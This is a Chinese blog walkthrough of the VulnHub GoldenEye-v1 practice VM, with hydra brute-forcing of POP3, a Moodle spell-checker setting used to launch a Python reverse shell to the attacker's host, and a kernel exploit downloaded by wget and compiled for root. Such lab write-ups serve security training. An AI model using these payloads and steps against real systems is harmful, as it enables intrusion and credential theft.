Vulnhub系列-GoldenEye-v1

最新推荐文章于 2023-12-27 00:19:28 发布
最新推荐文章于 2023-12-27 00:19:28 发布
阅读量622 收藏 1
点赞数 4
分类专栏: Vulnhub系列 文章标签: 安全 linux web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ZXT2804567059/article/details/122293718
版权

靶机:192.168.12.132
kali:192.168.12.128

一、信息搜集

nmap -A -p- 192.168.12.132
请添加图片描述
查看80端口
web目录:/sev-home
请添加图片描述
访问发现需要用户名和密码
请添加图片描述
查看源代码
terminal.js
请添加图片描述
访问terminal.js文件
一串unicode编码
Boris的password
请添加图片描述请添加图片描述
得到:用户名/密码=boris/InvincibleHack3r
成功登陆
请添加图片描述
查看源代码发现两个用户名
Natalya Boris

请添加图片描述
爆破密码
hydra -l Boris -P /usr/share/wordlists/fasttrack.txt 192.168.12.132 -s 55007 pop3
请添加图片描述
hydra -l natalya -P /usr/share/wordlists/fasttrack.txt 192.168.12.132 -s 55007 pop3
请添加图片描述
用户名:Boris
密码:secret1!
用户名:natalya
密码:bird

pop3协议命令

Boris用户
nc 192.168.12.132 55007
user Boris
pass secret1!
list
top 1
retr 1

natalya用户
同上操作登陆
retr 2 第二个邮件发现用户名和密码
用户名:xenia
密码:RCP90rulez!

提示我们修改hosts文件访问severnaya-station.com
请添加图片描述
gedit /etc/hosts 修改hosts文件
请添加图片描述
访问后点击login
请添加图片描述成功登陆xenia用户
发现还有个doak用户
请添加图片描述
再次爆破
hydra -l doak -P /usr/share/wordlists/fasttrack.txt 192.168.12.132 -s 55007 pop3
请添加图片描述nc 192.168.12.132 55007 同上登陆doak用户
retr 1
读取第一个邮件发现
用户:dr_doak
密码:4England!

请添加图片描述
登陆dr_doak用户发现txt文件
请添加图片描述
敏感目录:/dir007key/for-007.jpg
请添加图片描述
一串base64
请添加图片描述
请添加图片描述
试下发现是admin的密码
用户:admin
密码:xWinter1995x!

登陆admin用户

二、Getshell(moodle)

我的是msf6
旧版本的应该可以msf直接弹shell(我没试)
请添加图片描述
修改拼写引擎
请添加图片描述
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.12.128",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' –弹shell的payload
请添加图片描述nc -lvp 4444 监听4444端口
点击拼写检查
请添加图片描述成功弹shell
请添加图片描述

三、提权(linux ubuntu 3.13.0)

uname -a 查看内核版本
请添加图片描述searchsploit linux ubuntu 3.13.0 查找有无可利用漏洞

请添加图片描述searchsploit -p 37292.c 查看路径
请添加图片描述
靶机没有gcc 改为cc
请添加图片描述
python -m SimpleHTTPServer 8000
wget 192.168.12.128:8000/37292.c
gcc 37292.c -o exp 编译
./exp 运行即可
请添加图片描述
成功root

{Yasso}
关注
  • 4
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论
专栏目录
1-vulnhub GoldenEye-v1实战
weixin_45345568的博客
04-15 1317
靶机下载地址为:https://www.vulnhub.com/entry/goldeneye-1,240/ 本次的靶机ip为192.168.3.11(桥接模式自动获取) 一、信息搜集: 1.扫描ip 发现靶机ip为192.168.3.11 2.使用nmap进行扫描端口 发现其中有一个是网站 其余三个是与邮件协议相关的端口 nmap -sS -Pn 1-65535 192.168.3.11 Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-03 22.
1-VulnHub-GoldenEye-v1
尼德霍格007
07-07 729
靶机地址:https://www.vulnhub.com/entry/goldeneye-1,240/ 目标:得到root权限&找到flag.txt 作者:尼德 时间:2021-7-7 一、信息收集 打开kali虚拟机和目标机Golden Eye-v1,两台虚拟机网络都处于NAT模式 kali查看本机IP段,我的是192.168.21.0/24 nmap扫一下本网段 由于我这里只开了两台虚拟机,一台是kali,另一台扫描到的就是Golden Eye-v1,可以看到目标机的IP地址是192.16
Vulnhub-GoldenEye
m0_52016680的博客
09-18 449
Vulnhub类OSCP靶机
Vulnhub靶机 GoldenEye
菜浪马废的博客
04-27 341
80端口 账号:Boris 密码:InvincibleHack3r 暗示我利用pop3 将提到过的名字作为字典 hydra爆破 两个账户密码 pop命令 给了一个账号 让配置/etc/hosts 提到了一个名字 doak hydra爆破 有一个账号 让我们登录刚才的网站 一个文件地址 还有adm1n cr3ds clear txt 没处理 直接打开...
vulnhub-GoldenEye靶机
plant1234的博客
07-18 773
vulnhub-GoldenEye靶机: 准备工作: 首先根据根据网址下载靶场: 连接地址:https://www.vulnhub.com/entry/goldeneye-1,240/ 设置: 1,获取地址之后用VMware导入打开,设置网络适配器为NAT模式 (也可以是其它的但要清楚网段) 2,开启靶机 目标: 得到root权限&找到flag.txt 开始测试 一、信息收集: 1、获取对应的靶机IP: 1、这里我们要知道靶机是在那一个网段可以在VMware的 编辑中的虚拟网络编辑器中查看,靶机所在
Python-GoldenEye一个HTTPDoS测试工具
08-10
在这个名为"GoldenEye-master"的压缩包文件中,我们可以预期找到的是GoldenEye项目的源代码和相关资源。 在Python开发领域,测试工具如GoldenEye对于保障网络服务的稳定性和安全性至关重要。HTTP DoS攻击是通过发送...
Android-GoldenEye:Camera1和Camera2 API的包装,公开了易于使用的界面
02-03
Android-GoldenEye是一个开源库,它为Android开发者提供了一个便捷的方式来访问和操作摄像头,同时兼容了Camera1和Camera2 API。这个库的核心目标是通过一个简洁、易用的接口来封装复杂的Android相机API,使得开发者...
靶机GoldenEye-V1练习报告1
08-08
靶机GoldenEye-V1练习报告1
GoldenEye-master
05-09
GoldenEyedos是一款十分强的的dos工具,特别是对于一些中小型网站。
goldeneye-50.zip
04-26
《STK模型:goldeneye-50.zip的详解与应用》 STK,全称System Tool Kit,是一款广泛应用于航天、通信、气象等领域的高级仿真软件。它以其强大的建模和仿真能力,使得用户能够对复杂的系统进行精确的分析和预测。在...
VulnHub-GoldenEye-1-Walkthrough渗透学习
qq_34801745的博客
12-26 4079
** VulnHub-GoldenEye-1-Walkthrough ** 靶机地址:https://www.vulnhub.com/entry/goldeneye-1,240/ 靶机难度:中等(CTF) 靶机发布日期:2018年5月4日 靶机描述:靶机命名来自詹士邦系列的电影——GoldenEye 目标:得到root权限&找到flag.txt 作者:大余 时间:2019-12-26 请注...
Vulnhub-GoldenEye  -靶机渗透
嗯嗯呐的博客
11-03 1169
Vulnhub-GoldenEye -靶机渗透 提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 前言 一、pandas是什么? 二、使用步骤 1.引入库 2.读入数据 总结 前言 靶机地址:https://www.vulnhub.com/entry/goldeneye-1,240/ 目标:root目录下flag.txt文件 提示:以下是本篇文章正文内容,下面案例可供参考 一、信息收集 按照完成靶机后,通过nmap扫描靶机...
【渗透测试】VulnHub-GoldenEye-1
m0_52923241的博客
10-22 356
VulnHub-GoldenEye-1VulnHub-GoldenEye-1 详细阶梯步骤知识点总结kali自带字典目录vim文本编辑器linux通过修改/etc/hosts文件 添加IP地址与域名的映射Moodle(CVE-2013-3630)在linux下如何本地开启端口常用工具篇POP3:电子邮件协议Hydra:暴力破解工具Netcat:网络测试工具burpsuite-Decoder:编码解码工具SearchSploit漏洞查找工具查看jpg文件底层内容工具 VulnHub-GoldenEye-1 详
Vulnhub-GoldenEye靶机渗透
蘇同学的安全屋的博客
08-29 301
GoldenEye、渗透、提权
vulnhub 靶机 GOLDENEYE: 1
qq_44029310的博客
07-07 866
涉及知识点:pop3邮件服务器,隐写,hydra爆破,Moodle系统漏洞,反弹shell中base64编码绕过,CC编译。
vulnhub靶机GoldenEye实战(记录向)
kiwi的博客
02-01 371
接着我就去乱翻,翻到了一份邮件,是doak用户给我的。其实在另外一边我也尝试了搞25端口,因为我从来没有搞过25端口,按照老办法就是将扫描到的版本信息进行漏洞搜索,先问问度娘postfix smtp有什么漏洞,期间我查阅了大量资料,发现有一个漏洞可以进行邮件伪造,结合上面登录成功后的提示信息,我怀疑可能需要发送邮件给GNO,但是我哪里知道它的邮箱是什么,于是便在网上查阅信息,能否有一种方案能够通过ip发送,无奈,没有。我们改好了hosts文件,尝试访问登录,看起来像cms,但是我不确定,上。
【甄选靶场】Vulnhub百个项目渗透——项目一:GoldenEye(密码爆破,图片逆向分析,内核提权)
人间体佐菲的博客
08-29 1539
Vulnhub百个项目渗透——项目一:GoldenEye(密码爆破,图片逆向分析,内核提权)
vulnhub-GoldenEye靶机通关(超详细)
最新发布
weixin_53730939的博客
12-27 1470
vulnhub-GoldenEye靶机通关(超详细)
VulnHub-GoldenEye-学习记录
m0_51313985的博客
10-17 322
前言:最近有点迷茫后面的路不知道该怎么继续往下走,再团队师傅的指点下我开始对vulnhub的靶场进行学习,比较好的一点是靶机是从外网到内网的一整个过程,可以系统性的进行学习 关于靶机的教程网上已经有很多师傅写了,第一次打这种靶机也是参照了师傅们的方法,希望后面能养出自己的思路 首先把靶机从官网down下来,安装完靶机之后开始复现 1.nmap扫描 靶机是NAT桥接,共享的本机ip,使用nmap扫描本网段 基础的nmap指令百度一搜就有,这里就不放了 这里发现了目标ip:192.168.149.130 开始
VulnHub 靶机系列实战教程.pdf
07-22
"VulnHub靶机系列实战教程,由ins1ght编写,是针对网络安全领域的实战教程,涵盖了多个VulnHub靶机的详细攻略。教程旨在帮助读者通过实际操作提升网络安全技能,适合初学者及有一定基础的学习者。教程内容包括多个...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

{Yasso}

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值